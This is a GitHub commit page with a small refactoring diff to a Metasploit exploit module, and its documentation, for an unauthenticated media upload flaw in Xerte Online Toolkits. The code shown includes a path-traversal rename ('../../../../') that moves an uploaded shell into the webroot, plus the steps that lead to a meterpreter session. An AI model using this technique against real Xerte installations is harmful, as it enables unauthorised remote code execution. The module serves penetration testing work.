Skip to content

Commit cac3fd3

Browse files
bootstrapboolbootstrapbool
committed
Small tweaks
1 parent 0701851 commit cac3fd3

2 files changed

Lines changed: 18 additions & 12 deletions

File tree

documentation/modules/exploit/multi/http/xerte_unauthenticated_mediaupload.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -119,7 +119,7 @@ which.
119119
3. `set RHOSTS <target>`
120120
4. `set TARGETURI <uri to xerte>` (e.g., `xerteonlinetoolkits/`)
121121
5. `set LHOST <your_ip>`
122-
6. `set username <valid user>`
122+
6. `set USERNAME <valid user>`
123123
7. `exploit`
124124

125125
On success a meterpreter session will be started

modules/exploits/multi/http/xerte_unauthenticated_mediaupload.rb

Lines changed: 17 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -1,3 +1,5 @@
1+
# frozen_string_literal: true
2+
13
##
24
# This module requires Metasploit: https://metasploit.com/download
35
# Current source: https://github.com/rapid7/metasploit-framework
@@ -89,13 +91,15 @@ def get_elfinder_id(name, volume_id = 'l1')
8991
def create_dir(connector_uri, params, dirname, root_dir_id)
9092
dir_id = get_elfinder_id(dirname)
9193

92-
params['cmd'] = 'mkdir'
93-
params['name'] = dirname
94-
params['target'] = root_dir_id
94+
create_dir_params = params.merge(
95+
'cmd' => 'mkdir',
96+
'name' => dirname,
97+
'target' => root_dir_id
98+
)
9599

96100
res = send_request_cgi({
97101
'uri' => connector_uri,
98-
'vars_get' => params
102+
'vars_get' => create_dir_params
99103
})
100104

101105
unless res && res.code == 302
@@ -141,13 +145,15 @@ def upload_file(connector_uri, params, filename, dir_id, payload)
141145
end
142146

143147
def rename_file(connector_uri, params, shellname, dirname, file_id)
144-
params['cmd'] = 'rename'
145-
params['target'] = file_id
146-
params['name'] = "#{dirname}/../../../../#{shellname}"
148+
rename_file_params = params.merge(
149+
'cmd' => 'rename',
150+
'target' => file_id,
151+
'name' => "#{dirname}/../../../../#{shellname}"
152+
)
147153

148154
res = send_request_cgi({
149155
'uri' => connector_uri,
150-
'vars_get' => params
156+
'vars_get' => rename_file_params
151157
})
152158

153159
unless res && res.code == 302
@@ -217,14 +223,14 @@ def exploit
217223
success = true
218224
vprint_status("Successfully uploaded shell through #{project_dir}")
219225

220-
register_file_for_cleanup("#{base_params['uploadDir']}#{dirname}")
226+
register_dir_for_cleanup("#{base_params['uploadDir']}#{dirname}")
221227
register_file_for_cleanup("#{base_params['uploadDir']}#{filename}")
222228
register_file_for_cleanup("#{webroot}/#{shellname}")
223229
break
224230
end
225231

226232
if !success
227-
print_error('Exploit failed. The target user likely has no projects.')
233+
fail_with(Failure::NotFound, 'Exploit failed. The target user likely has no projects.')
228234
end
229235
end
230236

@@ -234,7 +240,7 @@ def check
234240

235241
res = send_request_cgi('uri' => uri)
236242

237-
if res && res.code != 200
243+
if res.nil? || res && res.code != 200
238244
return Exploit::CheckCode::Unknown('Failed to connect to /setup. It was likely removed by an administrator after installation.')
239245
end
240246

0 commit comments

Comments
 (0)